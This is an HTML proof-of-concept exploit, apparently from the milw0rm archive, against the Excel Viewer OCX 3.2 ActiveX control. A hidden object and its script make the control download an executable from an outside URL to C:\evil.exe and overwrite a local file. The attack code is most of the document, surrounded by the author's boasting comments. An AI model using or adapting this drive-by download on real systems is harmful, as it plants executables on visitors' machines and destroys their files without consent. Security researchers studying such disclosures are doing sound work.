62 lines
No EOL
1.9 KiB
HTML
62 lines
No EOL
1.9 KiB
HTML
<html>
|
|
<body>
|
|
/*
|
|
--=0-0-000000000--x==-xxxxxxxxx<br/>
|
|
-
|
|
Excel Viewer OCX 3.2 <br/>
|
|
homepage: www.officeocx.com <br/>
|
|
download: www.brothersoft.com/excel-viewer-ocx-51797.html <br/>
|
|
|
|
- RegKey Safe for Script: True<br/>
|
|
- RegKey Safe for Init: True <br/>
|
|
- Implements IObjectSafety: True <br/>
|
|
- IDisp Safe: Safe for untrusted: caller,data <br/>
|
|
- IPersist Safe: Safe for untrusted: caller,data <br/>
|
|
- IPStorage Safe: Safe for untrusted: caller,data <br>
|
|
- Tested on Avant Browser 11.7.21 ie 6
|
|
<br/>
|
|
Vuln: <br/>
|
|
1) Arbitrary File Download [HttpDownloadFile]<br/>
|
|
2) Arbitrary file owerwrite [Save] <br/>
|
|
<br/>
|
|
--==0-0000000011011110=== <br/>
|
|
|
|
Propably it worst apps i ever see <br/>
|
|
this is funy that It is meant as Safe for scripting <br/>
|
|
They want sell it l0l <br/>
|
|
|
|
---000----------++++---------------000 <br/>
|
|
Alfons Luja <br/>
|
|
Pozdrawiam swoich fanóF <br/>
|
|
9002 <br/>
|
|
:P <br/>
|
|
00 -0000000000000000===------------------x <br/>
|
|
*/<br/>
|
|
|
|
<div style="visibility:hidden;">
|
|
<object classid='clsid:18A295DA-088E-42D1-BE31-5028D7F9B965' id='kupa'></object>
|
|
<script type="text/javascript">
|
|
/*
|
|
I dont know why but this code act correct only first time
|
|
later it just crash ie
|
|
In avant browser always is ok but it is necessary to wait a lot time
|
|
to finsh loading
|
|
- strange :x
|
|
*/
|
|
|
|
try{
|
|
var obj = document.getElementById('kupa');
|
|
var rem = "http://www.adalex.pl/motyl/motyl-radio.exe";
|
|
var loc = "C:\evil.exe";
|
|
obj.Save("C:\owerwrite.ini");
|
|
obj.HttpDownloadFile(rem,loc);
|
|
}
|
|
catch(err){
|
|
window.alert('Poc failed');
|
|
}
|
|
</script>
|
|
</div>
|
|
</body>
|
|
</html>
|
|
|
|
# milw0rm.com [2009-01-12] |